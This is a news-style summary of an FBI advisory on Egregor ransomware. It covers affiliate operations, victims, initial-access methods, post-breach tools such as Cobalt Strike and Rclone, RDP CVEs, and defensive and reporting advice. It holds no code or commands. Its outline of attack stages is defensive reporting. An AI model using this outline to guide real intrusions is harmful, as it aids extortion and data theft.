The Federal Bureau of Investigation (FBI) published a Private Industry Advisory regarding the growing number of cases of Egregor ransomware attacks.
This ransomware-as-a-service operation was first discovered in September 2020. The attackers behind the Egregor ransomware attacks get affiliates to spread their ransomware. When they get any ransom payment, the affiliates get a commission. The affiliates were very active in the last three months and have executed attacks on a lot of big businesses. The victims of Egregor ransomware attacks include Ubisoft, Barnes & Noble, Crytek, Kmart, and TransLink, a Canadian transportation agency.
The threat group remarks that it has already accessed over 150 company systems and deployed the Egregor ransomware. Companies have paid over $4 million in ransom demands. The threat group has a lot of recruited affiliates and every one has a chosen strategy of spreading the ransomware. Because of a broad variety of ways, strategies, and procedures employed to transmit the ransomware, network defenders can have difficulty protecting against attacks.
Preliminary access to company systems is usually gained by means of phishing attacks directed at company email accounts. Clicking attachments with malicious code triggers the download of the ransomware payload. Other techniques used are brute force attacks on not strong passwords and the vulnerabilities exploitation in Virtual Private Networks (VPNs) and Remote Desktop Protocol (RDP).
As soon as a system is breached, the attackers elevate privileges and move inside the networks employing tools like AdFind, Cobalt Strike, Advanced IP Scanner, and malware like QakBot. They explore the network to look for sensitive files, which are downloaded using Rclone and 7zip, sometimes covering up the action as a Service Host Process (svchost). The downloaded information is employed to force victims to pay the ransom. If no payment is made, the threat actors will sell or publish the information.
The ransomware’s first appearance was around that time when the Maze ransomware operation ended. Maze ransomware affiliates turned to Egregor ransomware distribution. A number of security researchers are saying that the Maze ransomware gang is behind the Egregor ransomware attacks because of the appearance of Egregor when the Maze operation ended. There were also commonalities between the attacked companies and the ransom demands. The threat actors behind the Egregor ransomware operation likewise seem experts in operating ransomware-as-a-service.
The FBI has cautioned against giving ransom payments because there’s no assurance that valid decryption keys will be given and that stolen files will be deleted. Giving the ransom only serves to finance future attacks and motivates the threat actors to maintain their activity.
Because of the varied strategies and techniques used to spread the ransomware, network defenders must apply stricter security throughout the company. To make sure the recovery of data in case of an attack, there must be regular backups of critical information, and the backups must be saved offline, on an external hard drive or on the cloud that is not linked to the company network.
There must be antivirus and antimalware solutions with automatic updates. Email security gateways must be employed to prohibit phishing attacks. Multi-factor authentication must be applied to all company email accounts and remote access accounts. With multi-factor authentication, strong passwords are mandatory.
Be sure to use secure networks for remote access and never use public Wi-Fi networks. Public-facing remote access options must be updated on a regular basis and patches must be applied immediately. A number of attacks led to the breach of networks through the exploitation of vulnerabilities in RDP like CVE-2020-0609, CVE-2020-16896, CVE-2020-0610, CVE-2019-1489, CVE-2019-1224, CVE-2019-1225, CVE-2019-1108. Therefore, patching is a priority. The FBI additionally advises going over suspicious .bat and .dll files along with recon data, such as .log files, and watching out for the usage of exfiltration tools.
Victims of Egregor ransomware attacks should report the attacks to the FBI office in their locality or to the FBI’s 24/7 CyberWatch. Victims must also remember that ransom payment could have sanctions risks. In 2020, the Office of Foreign Assets Control (OFAC) of the Treasury Department cautioned that ransom payment may violate OFAC policies if it entails a sanction nexus. Therefore, victims should contact OFAC before paying any ransom demand to prevent future sanctions.